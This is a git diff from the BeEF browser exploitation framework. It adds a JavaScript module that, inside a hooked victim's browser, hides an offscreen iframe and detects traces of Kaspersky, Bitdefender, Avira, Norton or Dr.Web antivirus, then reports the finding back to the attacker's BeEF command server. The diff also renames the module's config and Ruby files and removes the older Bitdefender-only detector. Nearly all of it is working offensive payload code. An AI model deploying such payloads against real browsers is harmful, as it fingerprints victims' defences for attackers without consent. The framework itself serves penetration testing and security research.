diff --git a/modules/host/detect_antivirus/command.js b/modules/host/detect_antivirus/command.js new file mode 100644 index 000000000..bbe3ba93c --- /dev/null +++ b/modules/host/detect_antivirus/command.js @@ -0,0 +1,40 @@ +// +// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + //Detection of av elements starts + var image = ""; + var iframe = document.createElement("iframe"); + iframe.setAttribute("style", "margin-left:-10000000000px; margin-right: -10000000000px"); + iframe.setAttribute("id", "frmin"); + document.body.appendChild(iframe); + iframe.contentWindow.document.open(); + iframe.contentWindow.document.write(image); + iframe.contentWindow.document.close(); + + var frm = document.getElementById("frmin"); + ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML; + var AV = document.getElementById("abs-top-frame"); + var NAV = document.getElementById("coFrameDiv"); + //Detection of av elements ends + + if (ka.indexOf("kasperskylab_antibanner") !== -1) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky'); + else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Bitdefender'); + else if (AV !== null) { + if (AV.outerHTML.indexOf('/html/top.html') >= 0 & AV.outerHTML.indexOf('chrome-extension://') >= 0) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avira'); + } else if (NAV !== null) { + var nort = NAV.outerHTML; + if (nort.indexOf('coToolbarFrame') >= 0 & nort.indexOf('/toolbar/placeholder.html') >= 0 & nort.indexOf('chrome-extension://') >= 0) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Norton'); + } else if (document.getElementsByClassName('drweb_btn').length > 0) + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=DrWeb'); + else beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Not Detected'); + +}); \ No newline at end of file diff --git a/modules/host/detect_bitdefender2012/config.yaml b/modules/host/detect_antivirus/config.yaml similarity index 61% rename from modules/host/detect_bitdefender2012/config.yaml rename to modules/host/detect_antivirus/config.yaml index a5c5eb4b7..576de4e30 100644 --- a/modules/host/detect_bitdefender2012/config.yaml +++ b/modules/host/detect_antivirus/config.yaml @@ -5,11 +5,11 @@ # beef: module: - detect_bitdefender2012: + detect_antivirus: enable: true category: "Host" - name: "Detect Bit Defender 2012" - description: "This module detect the javascript code automatically included by Bitdefender 2012" - authors: ["nbblrr"] + name: "Detect Antivirus" + description: "This module detect the javascript code automatically included by some AVs (currently supports detection for Kaspersky, Avira, BitDefender, Norton, Dr. Web)" + authors: ["phosphore","vah13","nbblrr"] target: working: ["ALL"] diff --git a/modules/host/detect_bitdefender2012/module.rb b/modules/host/detect_antivirus/module.rb similarity index 66% rename from modules/host/detect_bitdefender2012/module.rb rename to modules/host/detect_antivirus/module.rb index ab5513bbe..10b72a6ff 100644 --- a/modules/host/detect_bitdefender2012/module.rb +++ b/modules/host/detect_antivirus/module.rb @@ -4,10 +4,10 @@ # See the file 'doc/COPYING' for copying permission # -class Detect_bitdefender2012 < BeEF::Core::Command +class Detect_antivirus < BeEF::Core::Command def post_execute - save({'BitDefender' => @datastore['bitdefender']}) + save({'Antivirus' => @datastore['antivirus']}) end end diff --git a/modules/host/detect_bitdefender2012/command.js b/modules/host/detect_bitdefender2012/command.js deleted file mode 100644 index 267ed508b..000000000 --- a/modules/host/detect_bitdefender2012/command.js +++ /dev/null @@ -1,17 +0,0 @@ -// -// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net -// Browser Exploitation Framework (BeEF) - http://beefproject.com -// See the file 'doc/COPYING' for copying permission -// - -beef.execute(function() { - var temp=document.body.innerHTML; - var key="netdefender/hui/ndhui.js"; - if(temp.indexOf(key)>0) { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed'); - } else { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed'); - }; - -}); -